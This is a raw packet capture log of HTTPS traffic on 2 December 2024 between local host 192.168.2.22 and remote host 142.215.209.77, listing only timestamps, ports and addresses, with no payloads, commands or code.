                                                            Dec 2, 2024 07:29:12.184655905 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.184662104 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.184700012 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.190197945 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.190207005 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.190248966 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.190254927 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.194324970 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.194371939 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.194379091 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.198679924 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.198724031 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.198729992 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.203538895 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.203584909 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.203592062 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.209029913 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.209080935 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.209086895 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.213200092 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.213248014 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.213255882 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.217719078 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.217765093 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.217772961 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.223026037 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.223072052 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.223078012 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.227332115 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.227377892 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.227385044 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.359041929 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.359201908 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.359220982 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.361999989 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.362006903 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.362029076 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.362046957 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.362056017 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.362090111 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.365566969 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.365575075 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.365595102 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.365614891 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.365627050 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.370142937 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.370151043 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.370167971 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.370187044 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.370198965 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.374161959 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.374167919 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.374203920 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.374209881 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.378387928 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.378395081 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.378432035 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.378438950 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.381922007 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.381928921 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.381967068 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.381975889 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.385710001 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.385736942 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.385757923 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.385763884 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.385797024 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.390199900 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.390207052 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.390243053 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.390249968 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.393727064 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.393774033 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.393779039 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.397871971 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.397918940 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.397924900 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.401546955 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.401592016 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.401597977 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.406160116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.406203985 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.406213045 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.409678936 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.409725904 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.409732103 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.413343906 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.413388014 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.413393021 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.417979956 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.418021917 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.418028116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.560370922 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.560448885 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.560466051 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.563572884 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.563580036 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.563604116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.563731909 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.563740015 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.567195892 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.567202091 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.567214966 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.567244053 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.567250967 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.567287922 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.571772099 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.571779966 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.571793079 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.571815968 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.571831942 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.575721979 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.575728893 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.575742006 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.575763941 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.575777054 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.578978062 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.578984022 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.579030037 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.579035997 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.583535910 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.583543062 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.583580017 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.583585978 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.587376118 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.587383986 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.587419033 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.587424040 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.591811895 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.591845989 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.591865063 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.591873884 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.591908932 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.595361948 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.595370054 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.595410109 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.595417023 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.599472046 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.599518061 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.599524021 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.603122950 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.603168964 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.603178024 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.607803106 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.607847929 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.607853889 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.611268997 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.611320972 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.611326933 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.614919901 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.614969015 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.614975929 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.619518995 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.619568110 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.619573116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.761904955 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.762121916 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.762135983 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.765475035 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.765481949 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.765505075 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.765522957 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.765532017 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.765594006 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.769129038 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.769135952 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.769154072 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.769172907 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.769187927 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.773715019 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.773720980 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.773746014 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.773804903 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.777230024 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.777235985 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.777256012 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.777288914 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.777304888 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.780864000 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.780869961 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.780925035 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.780932903 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.785475969 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.785482883 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.785528898 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.785537958 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.789012909 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.789045095 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.789069891 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.789077044 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.789105892 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.792702913 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.792710066 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.792766094 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.792773962 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.797298908 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.797353983 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.797362089 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.799401999 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.801408052 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.801469088 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.801475048 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.804928064 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.804984093 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.804991007 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.808604956 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.808659077 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.808670044 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.813127041 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.813185930 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.813194990 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.816431046 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.816804886 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.816854000 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.816859961 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.820316076 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.820365906 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.820373058 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.966697931 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.966767073 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.966778994 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.970611095 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.970617056 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.970638037 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.970659971 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.970666885 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.970698118 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.974248886 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.974256039 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.974272966 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.974301100 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.974317074 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.977730989 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.977739096 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.977755070 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.977782011 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.977797031 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.982515097 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.982522011 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.982534885 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.982568026 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.982580900 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.986078024 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.986084938 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.986133099 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.986140966 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.989562035 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.989583015 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.989604950 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.989610910 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.989650011 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.994196892 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.994205952 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.994252920 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.994260073 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.997780085 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.997824907 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.997831106 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.002373934 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.002430916 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.002437115 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.005624056 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.005666971 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.005672932 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.010051966 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.010101080 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.010108948 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.013709068 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.013777971 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.013784885 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.017195940 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.017241955 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.017249107 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.021806955 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.021852970 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.021858931 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.025455952 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.025504112 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.025510073 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.216286898 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.216440916 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.216453075 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.220184088 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.220191002 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.220211983 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.220230103 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.220237017 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.220272064 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.223881006 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.223887920 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.223916054 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.223936081 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.223948002 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.228445053 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.228451967 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.228477955 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.228499889 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.228512049 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.231971979 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.231978893 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.231992006 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.232014894 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.232027054 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.235728979 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.235735893 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.235771894 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.235779047 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.240215063 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.240221977 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.240261078 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.240267038 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.243763924 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.243771076 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.243813992 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.243820906 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.247304916 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.247319937 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.247345924 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.247354984 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.247395992 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.251974106 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.251981020 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.252027035 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.252034903 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.256097078 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.256139040 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.256145000 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.259624958 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.259670973 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.259676933 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.263297081 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.263348103 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.263354063 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.267880917 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.267926931 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.267935038 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.271575928 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.271620989 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.271626949 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.275028944 CET44349168142.215.209.77192.168.2.22
